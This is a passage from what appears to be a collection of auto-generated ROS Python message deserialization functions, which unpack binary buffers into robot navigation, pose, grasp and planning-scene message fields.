_struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.gateway_name = str[start:end].decode('utf-8')\n else:\n val1.gateway_name = str[start:end]\n _v61 = val1.platform_info\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v61.name = str[start:end].decode('utf-8')\n else:\n _v61.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v61.rocon_uri = str[start:end].decode('utf-8')\n else:\n _v61.rocon_uri = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v61.description = str[start:end].decode('utf-8')\n else:\n _v61.description = str[start:end]\n _v62 = _v61.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v62.resource_name = str[start:end].decode('utf-8')\n else:\n _v62.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v62.format = str[start:end].decode('utf-8')\n else:\n _v62.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v62.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v61.version = str[start:end].decode('utf-8')\n else:\n _v61.version = str[start:end]\n start = end\n end += 1\n (val1.is_local_client,) = _get_struct_B().unpack(str[start:end])\n val1.is_local_client = bool(val1.is_local_client)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.state = str[start:end].decode('utf-8')\n else:\n val1.state = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.ip = str[start:end].decode('utf-8')\n else:\n val1.ip = str[start:end]\n _v63 = val1.conn_stats\n _x = _v63\n start = end\n end += 40\n (_x.gateway_available, _x.time_since_last_seen, _x.ping_latency_min, _x.ping_latency_max, _x.ping_latency_avg, _x.ping_latency_mdev, _x.network_info_available, _x.network_type, _x.wireless_bitrate, _x.wireless_link_quality, _x.wireless_signal_level, _x.wireless_noise_level,) = _get_struct_Bq4fBbfb2f().unpack(str[start:end])\n _v63.gateway_available = bool(_v63.gateway_available)\n _v63.network_info_available = bool(_v63.network_info_available)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.rapps = []\n for i in range(0, length):\n val2 = rocon_app_manager_msgs.msg.Rapp()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.display_name = str[start:end].decode('utf-8')\n else:\n val2.display_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.description = 
str[start:end].decode('utf-8')\n else:\n val2.description = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.compatibility = str[start:end].decode('utf-8')\n else:\n val2.compatibility = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.status = str[start:end].decode('utf-8')\n else:\n val2.status = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.implementations = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3 = str[start:end].decode('utf-8')\n else:\n val3 = str[start:end]\n val2.implementations.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.preferred = str[start:end].decode('utf-8')\n else:\n val2.preferred = str[start:end]\n _v64 = val2.icon\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v64.resource_name = str[start:end].decode('utf-8')\n else:\n _v64.resource_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v64.format = str[start:end].decode('utf-8')\n else:\n _v64.format = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v64.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_interface = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_interface.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.public_parameters = []\n for i in range(0, length):\n val3 = rocon_std_msgs.msg.KeyValue()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.public_parameters.append(val3)\n val1.rapps.append(val2)\n self.gone.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.image is None:\n self.image = autonavigation.msg.Image()\n end = 0\n _x = self\n start = end\n end += 29\n (_x.unique_key, _x.gps_week, _x.gps_millisecond, _x.video_id, _x.image.header.seq, _x.image.header.stamp.secs, _x.image.header.stamp.nsecs,) = _struct_2IQB3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.image.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.image.header.frame_id = 
str[start:end]\n _x = self\n start = end\n end += 212\n (_x.image.localPose.time, _x.image.localPose.dr_x, _x.image.localPose.dr_y, _x.image.localPose.dr_z, _x.image.localPose.dr_heading, _x.image.localPose.dr_roll, _x.image.localPose.dr_pitch, _x.image.localPose.lf_speed, _x.image.localPose.rf_speed, _x.image.localPose.lr_speed, _x.image.localPose.rr_speed, _x.image.localPose.rot_x, _x.image.localPose.rot_y, _x.image.localPose.rot_z, _x.image.localPose.acc_x, _x.image.localPose.acc_y, _x.image.localPose.acc_z, _x.image.localPose.batteryState, _x.image.localPose.batteryEnergy, _x.image.localPose.steer, _x.image.localPose.brake, _x.image.localPose.fuel, _x.image.localPose.trans, _x.image.localPose.VehicleState, _x.image.localPose.mode, _x.image.localPose.drStatus, _x.image.localPose.errorStatus, _x.image.localPose.emergency_flag, _x.image.localPose.hardswitch_on, _x.image.gpsPos.gps_flag, _x.image.gpsPos.gps_week, _x.image.gpsPos.gps_millisecond, _x.image.gpsPos.longitude, _x.image.gpsPos.laltitude, _x.image.gpsPos.gaussX, _x.image.gpsPos.gaussY, _x.image.gpsPos.height, _x.image.gpsPos.pitch, _x.image.gpsPos.roll, _x.image.gpsPos.azimuth, _x.image.gpsPos.northVelocity, _x.image.gpsPos.eastVelocity, _x.image.gpsPos.upVelocity, _x.image.gpsPos.positionStatus, _x.image.gpsPos.rot_x, _x.image.gpsPos.rot_y, _x.image.gpsPos.rot_z, _x.image.gpsPos.acc_x, _x.image.gpsPos.acc_y, _x.image.gpsPos.acc_z, _x.image.height, _x.image.width,) = _struct_d21i7bBI6d13i2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.image.encoding = str[start:end].decode('utf-8')\n else:\n self.image.encoding = str[start:end]\n _x = self\n start = end\n end += 5\n (_x.image.is_bigendian, _x.image.step,) = _struct_BI.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.image.data = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.x is None:\n self.x = geometry_msgs.msg.PoseStamped()\n if self.x_desi is None:\n self.x_desi = geometry_msgs.msg.PoseStamped()\n if self.x_desi_filtered is None:\n self.x_desi_filtered = geometry_msgs.msg.PoseStamped()\n if self.x_err is None:\n self.x_err = geometry_msgs.msg.Twist()\n if self.xd is None:\n self.xd = geometry_msgs.msg.Twist()\n if self.xd_desi is None:\n self.xd_desi = geometry_msgs.msg.Twist()\n if self.F is None:\n self.F = geometry_msgs.msg.Wrench()\n if self.J is None:\n self.J = std_msgs.msg.Float64MultiArray()\n if self.N is None:\n self.N = std_msgs.msg.Float64MultiArray()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.x.header.seq, _x.x.header.stamp.secs, _x.x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x.header.frame_id = str[start:end]\n _x = 
self\n start = end\n end += 68\n (_x.x.pose.position.x, _x.x.pose.position.y, _x.x.pose.position.z, _x.x.pose.orientation.x, _x.x.pose.orientation.y, _x.x.pose.orientation.z, _x.x.pose.orientation.w, _x.x_desi.header.seq, _x.x_desi.header.stamp.secs, _x.x_desi.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x_desi.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x_desi.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.x_desi.pose.position.x, _x.x_desi.pose.position.y, _x.x_desi.pose.position.z, _x.x_desi.pose.orientation.x, _x.x_desi.pose.orientation.y, _x.x_desi.pose.orientation.z, _x.x_desi.pose.orientation.w, _x.x_desi_filtered.header.seq, _x.x_desi_filtered.header.stamp.secs, _x.x_desi_filtered.header.stamp.nsecs,) = _get_struct_7d3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.x_desi_filtered.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.x_desi_filtered.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 248\n (_x.x_desi_filtered.pose.position.x, _x.x_desi_filtered.pose.position.y, _x.x_desi_filtered.pose.position.z, _x.x_desi_filtered.pose.orientation.x, _x.x_desi_filtered.pose.orientation.y, _x.x_desi_filtered.pose.orientation.z, _x.x_desi_filtered.pose.orientation.w, _x.x_err.linear.x, _x.x_err.linear.y, _x.x_err.linear.z, _x.x_err.angular.x, _x.x_err.angular.y, _x.x_err.angular.z, _x.xd.linear.x, _x.xd.linear.y, _x.xd.linear.z, _x.xd.angular.x, _x.xd.angular.y, _x.xd.angular.z, _x.xd_desi.linear.x, _x.xd_desi.linear.y, _x.xd_desi.linear.z, _x.xd_desi.angular.x, _x.xd_desi.angular.y, _x.xd_desi.angular.z, _x.F.force.x, _x.F.force.y, _x.F.force.z, _x.F.torque.x, _x.F.torque.y, _x.F.torque.z,) = _get_struct_31d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau_pose = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau_posture = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tau = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.J.layout.dim = []\n for i in range(0, length):\n val1 = std_msgs.msg.MultiArrayDimension()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.label = str[start:end].decode('utf-8')\n else:\n val1.label = str[start:end]\n _x = val1\n start = end\n end += 8\n (_x.size, _x.stride,) = _get_struct_2I().unpack(str[start:end])\n self.J.layout.dim.append(val1)\n start = end\n end += 4\n (self.J.layout.data_offset,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.J.data = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.N.layout.dim = []\n for i in range(0, length):\n val1 = 
std_msgs.msg.MultiArrayDimension()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.label = str[start:end].decode('utf-8')\n else:\n val1.label = str[start:end]\n _x = val1\n start = end\n end += 8\n (_x.size, _x.stride,) = _get_struct_2I().unpack(str[start:end])\n self.N.layout.dim.append(val1)\n start = end\n end += 4\n (self.N.layout.data_offset,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.N.data = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def _from_cpp(self, str_msg, cls):\n msg = cls()\n result = msg.deserialize(str_msg)\n return result", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.position is None:\n self.position = geometry_msgs.msg.Point()\n if self.approach is None:\n self.approach = geometry_msgs.msg.Vector3()\n if self.binormal is None:\n self.binormal = geometry_msgs.msg.Vector3()\n if self.axis is None:\n self.axis = geometry_msgs.msg.Vector3()\n if self.width is None:\n self.width = std_msgs.msg.Float32()\n if self.score is None:\n self.score = std_msgs.msg.Float32()\n if self.sample is None:\n self.sample = geometry_msgs.msg.Point()\n end = 0\n _x = self\n start = end\n end += 128\n (_x.position.x, _x.position.y, _x.position.z, _x.approach.x, _x.approach.y, _x.approach.z, _x.binormal.x, _x.binormal.y, _x.binormal.z, _x.axis.x, _x.axis.y, _x.axis.z, _x.width.data, _x.score.data, _x.sample.x, _x.sample.y, _x.sample.z,) = _get_struct_12d2f3d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.planning_scene_diff is None:\n self.planning_scene_diff = arm_navigation_msgs.msg.PlanningScene()\n if self.operations is None:\n self.operations = arm_navigation_msgs.msg.OrderedCollisionOperations()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.robot_state.joint_state.name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.planning_scene_diff.robot_state.joint_state.name.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.planning_scene_diff.robot_state.joint_state.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n 
start = end\n end += struct.calcsize(pattern)\n self.planning_scene_diff.robot_state.joint_state.velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.planning_scene_diff.robot_state.joint_state.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 8\n (_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.robot_state.multi_dof_joint_state.poses = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v85 = val1.position\n _x = _v85\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v86 = val1.orientation\n _x = _v86\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.planning_scene_diff.robot_state.multi_dof_joint_state.poses.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.fixed_frame_transforms = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.TransformStamped()\n _v87 = val1.header\n start = end\n end += 4\n (_v87.seq,) = _struct_I.unpack(str[start:end])\n _v88 = _v87.stamp\n _x = _v88\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v87.frame_id = str[start:end].decode('utf-8')\n else:\n _v87.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.child_frame_id = str[start:end].decode('utf-8')\n else:\n val1.child_frame_id = str[start:end]\n _v89 = val1.transform\n _v90 = _v89.translation\n _x = _v90\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v91 = 
_v89.rotation\n _x = _v91\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.planning_scene_diff.fixed_frame_transforms.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.allowed_collision_matrix.link_names = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.planning_scene_diff.allowed_collision_matrix.link_names.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.allowed_collision_matrix.entries = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.AllowedCollisionEntry()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sB'%length\n start = end\n end += struct.calcsize(pattern)\n val1.enabled = numpy.frombuffer(str[start:end], dtype=numpy.bool, count=length)\n val1.enabled = map(bool, val1.enabled)\n self.planning_scene_diff.allowed_collision_matrix.entries.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.allowed_contacts = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.AllowedContactSpecification()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _v92 = val1.shape\n start = end\n end += 1\n (_v92.type,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n _v92.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n _v92.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v92.vertices = []\n for i in range(0, length):\n val3 = geometry_msgs.msg.Point()\n _x = val3\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v92.vertices.append(val3)\n _v93 = val1.pose_stamped\n _v94 = _v93.header\n start = end\n end += 4\n (_v94.seq,) = _struct_I.unpack(str[start:end])\n _v95 = _v94.stamp\n _x = _v95\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v94.frame_id = str[start:end].decode('utf-8')\n else:\n _v94.frame_id = str[start:end]\n _v96 = _v93.pose\n _v97 = _v96.position\n _x = _v97\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v98 = _v96.orientation\n _x = _v98\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.link_names = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8')\n else:\n val2 = str[start:end]\n val1.link_names.append(val2)\n start = end\n end += 8\n (val1.penetration_depth,) = 
_struct_d.unpack(str[start:end])\n self.planning_scene_diff.allowed_contacts.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.link_padding = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.LinkPadding()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.link_name = str[start:end].decode('utf-8')\n else:\n val1.link_name = str[start:end]\n start = end\n end += 8\n (val1.padding,) = _struct_d.unpack(str[start:end])\n self.planning_scene_diff.link_padding.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.collision_objects = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.CollisionObject()\n _v99 = val1.header\n start = end\n end += 4\n (_v99.seq,) = _struct_I.unpack(str[start:end])\n _v100 = _v99.stamp\n _x = _v100\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v99.frame_id = str[start:end].decode('utf-8')\n else:\n _v99.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (val1.padding,) = _struct_f.unpack(str[start:end])\n _v101 = val1.operation\n start = end\n end += 1\n (_v101.operation,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.shapes = []\n for i in range(0, length):\n val2 = arm_navigation_msgs.msg.Shape()\n start = end\n end += 1\n (val2.type,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n val2.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n val2.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.vertices = []\n for i in range(0, length):\n val3 = geometry_msgs.msg.Point()\n _x = val3\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n val2.vertices.append(val3)\n val1.shapes.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.poses = []\n for i in range(0, length):\n val2 = geometry_msgs.msg.Pose()\n _v102 = val2.position\n _x = _v102\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v103 = val2.orientation\n _x = _v103\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n val1.poses.append(val2)\n self.planning_scene_diff.collision_objects.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.planning_scene_diff.attached_collision_objects = []\n for i in range(0, length):\n val1 = arm_navigation_msgs.msg.AttachedCollisionObject()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.link_name = str[start:end].decode('utf-8')\n else:\n val1.link_name = str[start:end]\n _v104 
= val1.object\n _v105 = _v104.header\n start = end\n end += 4\n (_v105.seq,) = _struct_I.unpack(str[start:end])\n _v106 = _v105.stamp\n _x = _v106\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v105.frame_id = str[start:end].decode('utf-8')\n else:\n _v105.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v104.id = str[start:end].decode('utf-8')\n else:\n _v104.id = str[start:end]\n start = end\n end += 4\n (_v104.padding,) = _struct_f.unpack(str[start:end])\n _v107 = _v104.operation\n start = end\n end += 1\n (_v107.operation,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v104.shapes = []\n for i in range(0, length):\n val3 = arm_navigation_msgs.msg.Shape()\n start = end\n end += 1\n (val3.type,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n val3.triangles = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val3.vertices = []\n for i in range(0, length):\n val4 = geometry_msgs.msg.Point()\n _x = val4\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n val3.vertices.append(val4)\n _v104.shapes.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v104.poses = []\n for i in range(0, length):\n val3 = geometry_msgs.msg.Pose()\n _v108 = val3.position\n _x = _v108\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v109 = val3.orientation\n _x = _v109\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n _v104.poses.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.touch_links = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8')\n else:\n val2 = str[start:end]\n val1.touch_links.append(val2)\n self.planning_scene_diff.attached_collision_objects.append(val1)\n _x = self\n start = end\n end += 12\n (_x.planning_scene_diff.collision_map.header.seq, 